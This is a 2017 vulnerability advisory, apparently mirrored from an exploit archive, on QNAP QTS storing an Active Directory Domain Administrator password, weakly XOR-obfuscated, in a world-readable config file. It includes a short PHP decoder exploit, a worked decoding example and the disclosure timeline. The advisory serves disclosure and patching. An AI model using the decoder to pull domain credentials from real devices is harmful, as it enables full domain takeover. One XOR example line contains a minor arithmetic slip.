Skip to content
cyberexploits
localhardwaretext

QNAP QTS < 4.2.4 - Domain Privilege Escalation

QNAP QTS < 4.2.4 - Domain Privilege Escalation

Publié le 2017-03-27

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/local/41745.txt7eac4c3a
raw
QNAP QTS Domain Privilege Escalation Vulnerability



 Name              Sensitive Data Exposure in QNAP QTS

 Systems Affected  QNAP QTS (NAS) all model and all versions < 4.2.4

 Severity          High 7.9/10

 Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

 Vendor            http://www.qnap.com/

 Advisory          http://www.ush.it/team/ush/hack-qnap/qnap.txt

 Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it) 

                   Guido "go" Oricchio (g.oricchio AT pcego DOT com)

 Date              20170322



I. BACKGROUND



QNAP Systems, founded in 2004, provides network attached storage (NAS)

and network video recorder (NVR) solutions for home and business use to

the global market.

QNAP also delivers a cloud service, called myQNAPcloud, that allows

users to access and manage the devices from anywhere.

QTS is a QNAP devices proprietary firmware based on Linux.



ISGroup (http://www.isgroup.biz/) is an Italian Information Security 

boutique, we found this 0day issue while supporting Guido Oricchio 

of PCego, a System Integrator, to secure a QNAP product for one of his

customer.



Responsible disclosure with Qnap: we contacted qnap on public security@

contact and we escalate fast to their Security Researcher Myron Su on

PGP emails.



Prior vulnerabilities in QNAP: 

https://www.qnap.com/en/support/con_show.php?op=showone&cid=41



Information to customers of the vulnerability is shown in their bulletin

ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):

QTS 4.2.4 Build 20170313 includes security fixes for the following

vulnerabilities: Configuration file vulnerability (CVE-2017-5227)

reported by Pasquale Fiorillo of the cyber security company ISGroup

(www.isgroup.biz), a cyber security company, and Guido Oricchio of

PCego (www.pcego.com), a system integrator.



The latest version of the software at the time of writing can be 

obtained from:



https://www.qnap.com/en-us/product_x_down/

https://start.qnap.com/en/index.php

https://www.qnap.com/



II. DESCRIPTION



The vulnerability allows a local QTS admin user, or other low privileged

user, to access configuration file that includes a bad crypted Microsoft

Domain Administrator password if the NAS was joined to a Microsoft 

Active Directory domain.



The affected component is the "uLinux.conf" configuration file, 

created with a world-readable permission used to store a Domain 

Administrator password.



Admin user can access the file using ssh that is enabled by default.

Other users are not allowed to login, so they have to exploit a 

component, such as a web application, to run arbitrary command or 

arbitrary file read.



TLDR: Anyone is able to read uLinux.conf file, world readable by 

default, can escalate to Domain Administrator if a NAS is a domain 

member.



III. ANALYSIS



QNAP QTS stores "uLinux.conf" configuration file in a directory 

accessible by "nobody" and with permission that make them readable by 

"nobody".



If the NAS was joined to an Active Directory, such file contain a Domain

Administrator user and password in an easily decrypt format.



In older versions of QTS the Domain Admin's password was stored in

plaintext.



A) Config file readable by "nobody"



  [~] # ls -l /etc/config/uLinux.conf 

  -rw-r--r--    1 admin    administ      7312 Dec 10 06:39 /etc/config/uLinux.conf



  Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, 

  TS-469L, and TS-221. Access to the needed file are guaranteed to 

  all the local users, such as httpdusr used to running web sites and 

  web application hosted on the NAS.



  This expose all the information contained in the configuration file at

  risk and this is a violation of the principle of least privilege.



  https://en.wikipedia.org/wiki/Principle_of_least_privilege



B) Weak encrypted password in the configuration file



  The Microsoft Active Directory Admin username and password are stored 

  in the file obfuscated by a simple XOR cypher and base64 encoded.



  In this scenario, a Local File Read vulnerability could lead to full

  domain compromise given the fact that an attacker can re-use such

  credentials to authenticate against a Domain Controller with maximum

  privileges.



  The password field in the uLinux.conf has the following format:



  User = <username>

  Password = <base64>



  eg: 

  User = Administrator

  Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==



  The "<base64>" decoded is:



  sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C

  00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |

  00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|

  00000019



  Each byte xored with \x62 is the hex ascii code of the plaintext char.

  Eg: 

    \x03 ^ \x62 = \x61 (a)

    \x00 ^ \x62 = \x61 (b)

    ...

    \x24 ^ \x62 = \x46 (F)

    \x43 ^ \x62 = \x21 (!)

    

  The plaintext password is: aabbccddeeffAABBCCDDEEFF!



IV. EXPLOIT



The following code can be used to decode the password:



#!/usr/bin/php

<?php

$plaintext = str_split(base64_decode($argv[1]));

foreach($plaintext as $chr) {

	echo chr(ord($chr)^0x62);

}

echo "\n";



Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

aabbccddeeffAABBCCDDEEFF!



V. VENDOR RESPONSE

Vendor released QTS 4.2.4 Build 20170313 that contains the proper

security patch. At the time of this writing an official patch is

currently available.



VI. CVE INFORMATION



Mitre assigned the CVE-2017-5227 for this vulnerability, internally to

Qnap it's referred as Case NAS-201703-21.



VII. DISCLOSURE TIMELINE



20161212 Bug discovered

20170106 Request for CVE to Mitre

20170106 Disclosure to security@qnap.com

20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)

20170107 Details disclosure to Myron Su

20170109 Got CVE-CVE-2017-5227 from cve-assign

20170110 Myron Su confirm the vulnerability

20170203 We asks for updates, no release date from vendor

20170215 We extend the disclosure date as 28 Feb will not be met

20170321 QNAP releases the QTS 4.2.4 Build 20170313

20170322 Advisory disclosed to the public



VIII. REFERENCES



[1] Top 10 2013-A6-Sensitive Data Exposure

    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure



[2] Access Control Cheat Sheet

    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet



[3] https://forum.qnap.com/viewtopic.php?t=68317

    20121213 User reporting that the password was stored in plaintext in

    a world-readable file

    

[4] https://www.qnap.com/en/support/con_show.php?cid=113

    Qnap Security Bullettin NAS-201703-21 



IX. CREDIT



Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 

discovery of this vulnerability.



Pasquale "sid" Fiorillo

web site: http://www.pasqualefiorillo.it/

mail: sid AT ush DOT it



Guido "go" Oricchio

web site: http://www.pcego.com/

mail: g.oricchio AT pcego DOT com



X. LEGAL NOTICES



Copyright (c) 2017 Pasquale "sid" Fiorillo



Permission is granted for the redistribution of this alert

electronically. It may not be edited in any way without mine express

written consent. If you wish to reprint the whole or any

part of this alert in any other medium other than electronically,

please email me for permission.



Disclaimer: The information in the advisory is believed to be accurate

at the time of publishing based on currently available information. Use

of the information constitutes acceptance for use in an AS IS condition.

There are no warranties with regard to this information. Neither the

author nor the publisher accepts any liability for any direct, indirect,

or consequential loss or damage arising from use of, or reliance on,

this information.

Voir sur GitHub